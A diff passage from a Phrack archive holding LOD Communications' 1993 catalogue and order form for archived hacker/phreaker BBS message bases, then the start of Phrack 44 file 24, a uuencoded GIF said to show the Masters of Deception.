+feeling of deja vous all over again."
+ 
+*** {End CuD #5.39 Excerpts} ***
+ 
+ 
+VOLUME #1 CONTENTS:
+-------------------
+ 
+ LOD Communications (c) 1993: VOLUME #1 List of Hack/Phreak BBS Message Bases
+ ----------------------------------------------------------------------------
+ BBS NAME           A/C  SYSOP(S)        # MSGS   DATES      KBYTES   PROPHILE
+ ----------------------------------------------------------------------------
+ Alliance BBS       618  Phantom Phreaker  113    2/09/86 -   215       YES
+                         Doom Prophet      G,P    6/30/86
+ 
+ Black Ice Private  703  The Highwayman    880    12/1/88 -   560       YES
+                                           P,U    5/13/89
+ 
+ Broadway Show/     718  Broadway Hacker   180    9/29/85 -   99        YES  
+ Radio Station BBS                                12/27/85
+ 
+ CIA BBS            201  CIA Director      30     5/02/84 -   30         NO
+                                                  6/08/84
+ 
+ C.O.P.S.           305  Mr. Byte-Zap      227    11/5/83 -   196        YES 
+                         The Mechanic      G,R,U  7/16/84
+ 
+ Face To Face       713  Montressor        572    11/26/90 -  400        YES 
+                         Doc Holiday              12/26/90
+ 
+ Farmers Of Doom    303  Mark Tabas        41     2/20/85 -   124        YES
+                                           G      3/01/85
+ 
+ Forgotten Realm    618  Crimson Death     166    3/08/88 -   163         NO 
+                                                  4/24/88
+ 
+ Legion Of Doom!    305  Lex Luthor        194    3/19/84 -   283        YES 
+                         Paul Muad'Dib *   G,P,U  11/24/84
+ 
+ Metal Shop Private 314  Taran King        520    4/03/86 -   380        YES
+                         Knight Lightning  P,R,U  5/06/87
+ 
+ OSUNY              914  Tom Tone          375    7/9/82 -    368        YES 
+                         Milo Phonbil *    G,U    4/9/83
+ 
+ Phoenix Project    512  The Mentor        1118   7/13/88 -   590        YES
+                         Erik Bloodaxe *   G,R    2/07/90
+ 
+ Plover-NET         516  Quasi Moto        346    1/14/84 -   311        YES
+                         Lex Luthor *      G      5/04/84
+ 
+ Safehouse          612  Apple Bandit      269    9/15/83 -   251        YES 
+                                           G,U    5/17/84
+ 
+ Sherwood Forest I  212  Magnetic Surfer   92     5/01/84 -    85        YES 
+                                           P,U    5/30/84
+ 
+ Sherwood Forest ][ 914  Creative Cracker  100    4/06/84 -    200       YES 
+                         Bioc Agent 003 *  G      7/02/84
+ 
+ Split Infinity     408  Blue Adept        52     12/21/83 -   36        YES 
+                                                  1/21/84
+ 
+ Twilight Phone     ???  System Lord       17     9/21/82 -    24         NO
+                                                  1/09/83
+ 
+ Twilight Zone/     203  The Marauder      108    2/06/85 -   186        YES 
+ Septic Tank             Safe Cracker *    G,U    7/24/86
+ 
+ WOPR               617  Terminal Man      307    5/15/84 -   266        YES 
+                         The Minute Man *  G,U    1/12/85
+ _____________________________________________________________________________
+ 
+NOTES:  In SYSOP(S) column, * indicates remote sysop.
+ 
+        In #msgs column, P indicates that the BBS was Private, R indicates BBS
+        was public but restricted access sub-board(s) are included, G indicates
+        that SOME (or maybe all) of the G-files written by the sysop and/or
+        files that were available on the BBS are included, U indicates that a
+        BBS Userlist (typically undated) is included.
+ 
+        DATES column shows the starting and ending dates for which messages
+        were buffered (and therefore available) although there may be some
+        gaps in the chronological order.
+ 
+        KBYTES column shows size of complete file containing messages, g-files,
+        userlist, etc.  PROPHILE column indicates if a "BBS Pro-Phile" was
+        written and is included.
+ 
+LODCOM is currently organizing and splicing messages from over 30 more H/P
+BBSes [shown below] and, as the files are completed and/or as additional
+messages are procured for the above systems, updates of this listing will be
+released.  Modem Over Manhattan (MOM), 8BBS (213), Mines of Moria (713),
+Pirates Cove (516) sysop: BlackBeard, Catch-22 (617) sysop: Silver Spy, Phreak
+Klass 2600 (806) sysop: The Egyptian Lover, Blottoland (216) sysop:King Blotto,
+Osuny 2 (a.k.a. The Crystal Palace) (914), Split Infinity (408), The Hearing
+Aid, Shadowland (303) sysop: The ShadowMaster, ShadowSpawn (219) sysop: Psychic
+Warlord, IROC (817) sysop: The Silver Sabre, FreeWorld II (301) sysop: Major
+Havoc, Planet Earth (714), Ripco (312) sysop: Dr. Ripco, Hackers Heaven (217)
+sysop: Jedi Warrior, Demon Roach Underground (806) sysop: Swamp Ratte,
+Stronghold East Elite (516) sysop: Slave Driver, Pure Nihilism, 5th Amendment
+(713) sysop: Micron, Newsweek Elite (617) sysop: Micro Man, Lunatic Labs (415)
+sysop: The Mad Alchemist, Laser Beam (314), Hackers Den (718) sysop: Red
+Knight, The Freezer (305) sysop: Mr. Cool, The Boca Harbour (305) sysop: Boca
+Bandit, The Armoury (201) sysop: The Mace, Digital Logic's Data Center (305)
+sysop: Digital Logic, Asgard (201), The KGB, PBS (702), Lost City of Atlantis
+sysop: The Lineman, and more.
+ 
+ 
+*** Hacking/Phreaking Tutorials a.k.a. "G-Philes": ***
+------------------------------------------------------
+ 
+   Along with the above H/P BBS Message Bases, LODCOM has collected many of the
+old "philes" that were written and disseminated over the years.  A list of all
+of them would take up too much space here, however, we can tell you that the
+majority are NOT files that were originally written for electronic newsletters
+such as Phrack, PHUN, ATI, etc. (with the perhaps obvious exception of the
+LOD/H Technical Journal).  Those files/newsletters are readily available from
+other sources.  This hodgepodge includes files that somehow fell out of
+widespread circulation.  A Table of Contents of the collection is included but
+the tutorials are all grouped together in four large files of approximately
+250K each. 
+ 
+   UPDATE/ADDITION: A collection of material is being compiled from the H/P
+   BBS Message Bases and Files along with other sources that is an organized
+   conglomeration of all the writings of all the ex-members of the Legion of
+   Doom/Hackers group. It also includes private LOD/H Group sub-board message
+   bases that resided on the LOD BBS (1984), Catch-22 (1985), Phoenix Project
+   (1988), and Black Ice Private (1988) that were NOT included in those BBSes'
+   Message Bases. BBS Messages from before and after each member entered the
+   group along with any files they wrote will be organized, by member name,
+   into individual files. This is being done more for ourselves than anything
+   else as we are curious how much material was created over the years. Note
+   that this special collection of files will be sent to you around the same
+   time that Volume III is sent out and is free for ordering BOTH, the G-Phile
+   Collection mentioned above, and the Message Base Files.
+ 
+ 
+*** The Order Form: ***
+-----------------------
+ 
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+ 
+               LOD Communications H/P BBS Message Base ORDER FORM
+               ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ 
+   PERSONAL RATE:  Volumes 1, 2, 3, and possibly a fourth if created: $39.00
+   This price is total & includes any updates to individual BBS Message Bases.
+ 
+   COMMERCIAL RATE:  Corporations, Universities, Libraries, and Government
+   Agencies: $99.00  As above, price is total and includes updates.
+ 
+H/P BBS Message Bases (All Volumes): $________
+ 
+"G-Phile" Collection (Optional): $____________ ($10.00 Personal)
+                                               ($25.00 Commercial)
+ 
+Disk Format/Type of Computer: _____________________________________
+(Please be sure to specify diskette size [5.25" or 3.5"] and high/low density)
+ 
+File Archive Method (.ZIP [preferred], .ARJ, .LHZ, .Z, .TAR) ____________
+                    (ASCII [Non-Compressed] add $5.00 to order)
+ 
+Texas Residents add 8% Sales Tax.
+If outside North America please add $6.00 for Shipping & Handling.
+ 
+Total Amount (In U.S. Dollars): $ ___________
+ 
+Payment Method:  Check or Money Order please.
+Absolutely NO Credit Cards, even if it's yours :-)
+ 
+By purchasing these works, the Purchaser agrees to abide by all applicable U.S.
+Copyright Laws to not distribute or reproduce, electronically or otherwise, in
+part or in whole, any part of the Work(s) without express written permission
+from LOD Communications.
+ 
+Send To:
+          Name: _____________________________________
+ 
+  Organization: _____________________________________ (If applicable)
+ 
+        Street: _____________________________________
+ 
+City/State/Zip: _____________________________________
+ 
+       Country: _____________________________________
+ 
+E-mail address: _____________________________________ (If applicable)
+ 
+ 
+PRIVACY NOTICE:  The information provided to LOD Communications is used for
+sending orders and periodic updates to the H/P BBS Message Base Price List.
+It will NOT be given or sold to any other party.  Period.
+ 
+ 
+- - - - - - - - - - - - - - - C U T - H E R E - - - - - - - - - - - - - - - -
+ 
+Remit To:   LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA  78701
+ 
+Lodcom can also be contacted via E-mail:  lodcom@mindvox.phantom.com
+                             Voice Mail:  512-448-5098
+ _____________________________________________________________________________
+ End Order File V.2
+
+LOD Communications: Leaders in Engineering, Social and Otherwise ;)
+ 
+Email: lodcom@mindvox.phantom.com
+Voice Mail: 512-448-5098
+Snail Mail: LOD Communications
+            603 W. 13th
+            Suite 1A-278
+            Austin, Texas USA 78701
+ 
+
diff --git a/phrack44/24.txt b/phrack44/24.txt
new file mode 100644
index 0000000..b2da7fa
--- /dev/null
+++ b/phrack44/24.txt
@@ -0,0 +1,558 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 24 of 27
+
+****************************************************************************
+
+COURTESY OF THE UNITED STATES SECRET SERVICE 
+THE MASTERS OF DECEPTION "MOD" CIRCA NOVEMBER 1990
+GIF87A FORMAT, GREYSCALE
+
+begin 644 mod.gif
+M1TE&.#=AD &0 ?<      ,8   #& ,;&    QL8 Q@#&QL?'Q\?FQZK2_/O[
+M^^GIZ=C8V,7%Q;.SLZ&AH8^/CWQ\?&IJ:EE964='1S0T-"(B(A 0$       
+M@ " @ "  ("  (   (  @/S__SB @(#_ #@X /S2JO^  *BCHX X (  _X  
+M.  X@                                                       
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                         /___*.CJ(" @/\   #_
+M /__    __\ _P#______RP     D &0 0 (_P Q"!PX\,(%@@@3*ES(L"%#
+M"Q C2I18@8*$" \>.( P88($"1,J0*Q0D8)(@R@O3(28LJ4%A2T-.IQ)LV9#
+ME!)CZEQI<*4%G4"#!K594ZC1HT8=(EV*DB& IU !+/QYD*C5JRY]^J2 4:.#
+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
